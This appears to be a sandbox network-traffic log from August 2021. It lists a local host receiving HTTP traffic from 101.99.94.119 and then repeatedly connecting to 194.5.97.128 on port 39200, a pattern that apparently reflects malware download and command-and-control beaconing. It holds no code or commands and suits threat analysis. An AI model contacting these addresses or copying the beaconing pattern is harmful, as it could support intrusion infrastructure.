Aug 3, 2021 19:01:31.827718019 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827742100 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827764988 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827790022 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827815056 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827836990 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827856064 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827861071 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827873945 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827877998 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827882051 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827884912 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827888012 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827913046 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827936888 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827946901 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827961922 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827970982 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827986002 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.828011990 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.828049898 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.872462034 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.872503996 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.872525930 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.872549057 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.872669935 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.872729063 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873193979 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873224974 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873249054 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873271942 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873296022 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873318911 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873342037 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873367071 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873392105 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873415947 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873435974 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873439074 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873464108 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873488903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873511076 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873532057 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873550892 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873579979 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873603106 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873625994 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873652935 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873680115 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873691082 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873711109 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873737097 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873759985 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873775005 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873783112 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873796940 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873809099 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873815060 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873835087 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873840094 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873859882 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873862028 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873883963 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873907089 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873907089 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873929977 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873944998 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873954058 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.873966932 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.873976946 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874001980 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874003887 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874025106 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874027967 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874053001 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874053955 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874075890 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874078035 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874099970 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874103069 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874126911 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874128103 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874151945 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874152899 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874177933 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874177933 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874203920 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874205112 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874229908 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874232054 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874254942 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874258041 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.874281883 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.874306917 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.919333935 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.919378042 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.919394970 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.919414043 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920182943 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.920264006 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920305014 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920331955 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920355082 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920403957 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920429945 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920454025 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920478106 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920521021 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920547009 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920666933 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920691967 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920713902 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920738935 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920763016 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920789957 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920813084 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.920815945 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920840025 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920865059 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920888901 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920912981 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920937061 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920958996 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.920985937 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921010971 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921035051 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921060085 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921082973 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921108007 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921123028 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921133041 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921158075 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921202898 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921211004 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921236038 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921240091 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921260118 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921307087 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921307087 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921334028 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921356916 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921369076 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921385050 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921410084 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921462059 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921482086 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921508074 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921519041 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921533108 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921557903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921582937 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921593904 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.921607018 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921634912 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.921741962 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.968238115 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968277931 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968297005 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968326092 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968344927 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968362093 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968380928 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968399048 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968417883 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968435049 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968442917 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.968460083 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968485117 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968502998 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.968503952 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968522072 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968539953 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968564034 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968594074 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968611956 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.968708992 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:32.158843040 CEST	49737	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:32.204261065 CEST	39200	49737	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:32.714711905 CEST	49737	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:32.760873079 CEST	39200	49737	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:33.261708021 CEST	49737	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:33.307338953 CEST	39200	49737	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:34.350684881 CEST	49738	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:34.396122932 CEST	39200	49738	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:34.902509928 CEST	49738	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:34.947834015 CEST	39200	49738	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:35.449424028 CEST	49738	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:35.497546911 CEST	39200	49738	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:36.549909115 CEST	49739	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:36.595232010 CEST	39200	49739	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:36.986918926 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:36.991131067 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:37.105781078 CEST	49739	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:37.152164936 CEST	39200	49739	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:37.668495893 CEST	49739	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:37.714135885 CEST	39200	49739	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:38.754872084 CEST	49740	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:38.800308943 CEST	39200	49740	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:39.309056997 CEST	49740	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:39.354784012 CEST	39200	49740	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:39.856014967 CEST	49740	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:39.901487112 CEST	39200	49740	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:40.942661047 CEST	49741	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:40.988111019 CEST	39200	49741	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:41.496803999 CEST	49741	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:41.542408943 CEST	39200	49741	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:42.043781996 CEST	49741	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:42.089658976 CEST	39200	49741	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:43.135600090 CEST	49742	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:43.180861950 CEST	39200	49742	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:43.684899092 CEST	49742	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:43.730791092 CEST	39200	49742	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:44.231455088 CEST	49742	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:44.276813984 CEST	39200	49742	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:45.318911076 CEST	49743	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:45.364227057 CEST	39200	49743	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:45.872114897 CEST	49743	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:45.917606115 CEST	39200	49743	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:46.419078112 CEST	49743	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:46.464550972 CEST	39200	49743	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:47.787703991 CEST	49744	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:47.835181952 CEST	39200	49744	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:48.341038942 CEST	49744	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:48.386740923 CEST	39200	49744	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:48.888026953 CEST	49744	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:48.935595036 CEST	39200	49744	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:50.347017050 CEST	49745	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:50.392421007 CEST	39200	49745	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:50.903825045 CEST	49745	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:50.949477911 CEST	39200	49745	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:51.451174021 CEST	49745	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:51.498003006 CEST	39200	49745	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:52.547373056 CEST	49746	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:52.593035936 CEST	39200	49746	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:53.107076883 CEST	49746	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:53.152687073 CEST	39200	49746	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:53.654032946 CEST	49746	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:53.699664116 CEST	39200	49746	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:54.763672113 CEST	49747	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:54.813451052 CEST	39200	49747	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:55.326030016 CEST	49747	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:55.371587992 CEST	39200	49747	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:55.872931004 CEST	49747	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:55.918437004 CEST	39200	49747	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:56.964917898 CEST	49748	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:57.011188030 CEST	39200	49748	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:57.529369116 CEST	49748	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:57.575226068 CEST	39200	49748	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:58.076275110 CEST	49748	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:58.122037888 CEST	39200	49748	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:59.166533947 CEST	49749	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:59.213433981 CEST	39200	49749	194.5.97.128	192.168.2.3
Aug 3, 2021 19:01:59.717066050 CEST	49749	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:01:59.762954950 CEST	39200	49749	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:00.264048100 CEST	49749	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:00.309420109 CEST	39200	49749	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:01.353631020 CEST	49750	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:01.399060965 CEST	39200	49750	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:01.904691935 CEST	49750	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:01.950108051 CEST	39200	49750	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:02.451658010 CEST	49750	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:02.497041941 CEST	39200	49750	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:03.589061975 CEST	49751	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:03.634545088 CEST	39200	49751	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:04.139674902 CEST	49751	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:04.185086966 CEST	39200	49751	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:04.686223984 CEST	49751	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:06.282476902 CEST	39200	49751	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:07.946258068 CEST	49752	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:07.991743088 CEST	39200	49752	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:08.499001980 CEST	49752	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:08.544615030 CEST	39200	49752	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:09.045975924 CEST	49752	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:09.094203949 CEST	39200	49752	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:10.151664972 CEST	49753	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:10.196870089 CEST	39200	49753	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:10.716279030 CEST	49753	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:10.762630939 CEST	39200	49753	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:11.270401955 CEST	49753	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:11.318681002 CEST	39200	49753	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:12.389174938 CEST	49754	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:12.437469959 CEST	39200	49754	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:13.024385929 CEST	49754	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:13.070313931 CEST	39200	49754	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:13.623876095 CEST	49754	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:13.670046091 CEST	39200	49754	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:14.721273899 CEST	49756	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:14.769599915 CEST	39200	49756	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:15.329355955 CEST	49756	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:15.375165939 CEST	39200	49756	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:15.886887074 CEST	49756	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:15.933677912 CEST	39200	49756	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:16.990870953 CEST	49760	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:17.036313057 CEST	39200	49760	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:17.542409897 CEST	49760	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:17.587852955 CEST	39200	49760	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:18.090075016 CEST	49760	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:18.135418892 CEST	39200	49760	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:19.247694969 CEST	49765	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:19.293165922 CEST	39200	49765	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:19.808109045 CEST	49765	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:19.853629112 CEST	39200	49765	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:20.365909100 CEST	49765	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:20.411398888 CEST	39200	49765	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:21.463933945 CEST	49768	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:21.509176970 CEST	39200	49768	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:22.011514902 CEST	49768	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:22.057569027 CEST	39200	49768	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:22.574054003 CEST	49768	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:22.619478941 CEST	39200	49768	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:23.652000904 CEST	49769	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:23.697186947 CEST	39200	49769	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:24.199166059 CEST	49769	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:24.244839907 CEST	39200	49769	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:24.746186972 CEST	49769	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:24.794161081 CEST	39200	49769	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:25.847632885 CEST	49770	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:25.894572973 CEST	39200	49770	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:26.402396917 CEST	49770	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:26.447690010 CEST	39200	49770	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:26.949367046 CEST	49770	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:26.994740009 CEST	39200	49770	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:28.054327965 CEST	49771	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:28.100004911 CEST	39200	49771	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:28.606008053 CEST	49771	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:28.653687954 CEST	39200	49771	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:29.168338060 CEST	49771	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:29.213903904 CEST	39200	49771	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:30.254539013 CEST	49772	39200	192.168.2.3	194.5.97.128
